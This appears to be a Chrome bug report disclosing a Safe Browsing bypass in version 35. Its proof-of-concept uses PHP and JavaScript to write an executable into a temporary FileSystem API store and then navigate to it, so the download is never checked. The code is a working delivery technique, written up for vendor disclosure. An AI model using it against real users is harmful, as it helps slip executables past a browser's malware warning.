VULNERABILITY DETAILS
Safe Browsing for Executable Files can be bypassed by using the FileSystem API, by creating the .exe file to be downloaded in a temporary filesystem, and then navigating to it. A server-side PHP script in this case builds the javascript byte array, but other techniques could be used here (eg. an XMLHttpRequest returning a Blob.)
You must not be in Incognito mode for this to work.
VERSION
Chrome Version: 35.0.1916.114 m + stable
Operating System: Windows XP Home Edition Service Pack 3
REPRODUCTION CASE
Test case available at https://server2.vittgam.net/testerone123/exedlvuln/vuln.php
<script>
(function(){
var errorize=function(e){console.log(e);};
var filename='msghello-bypass.exe';
var blob=new Blob([new Uint8Array(<?php echo str_replace(',',', ',json_encode(array_map('ord',str_split(file_get_contents('msghello.exe'))))); ?>)],{type:'application/octet-stream'});
window.webkitRequestFileSystem(window.TEMPORARY,1048576,function(fs){
var createFile=function(){
fs.root.getFile(filename,{create:true,exclusive:true},function(fileEntry){
fileEntry.createWriter(function(writer){
writer.onwriteend=function(){
window.location.href=fileEntry.toURL();
};
writer.onerror=errorize;
writer.write(blob);
},errorize);
},errorize);
};
fs.root.getFile(filename,{create:false},function(fileEntry){
fileEntry.remove(createFile,errorize);
},createFile);
},errorize);
})();
</script>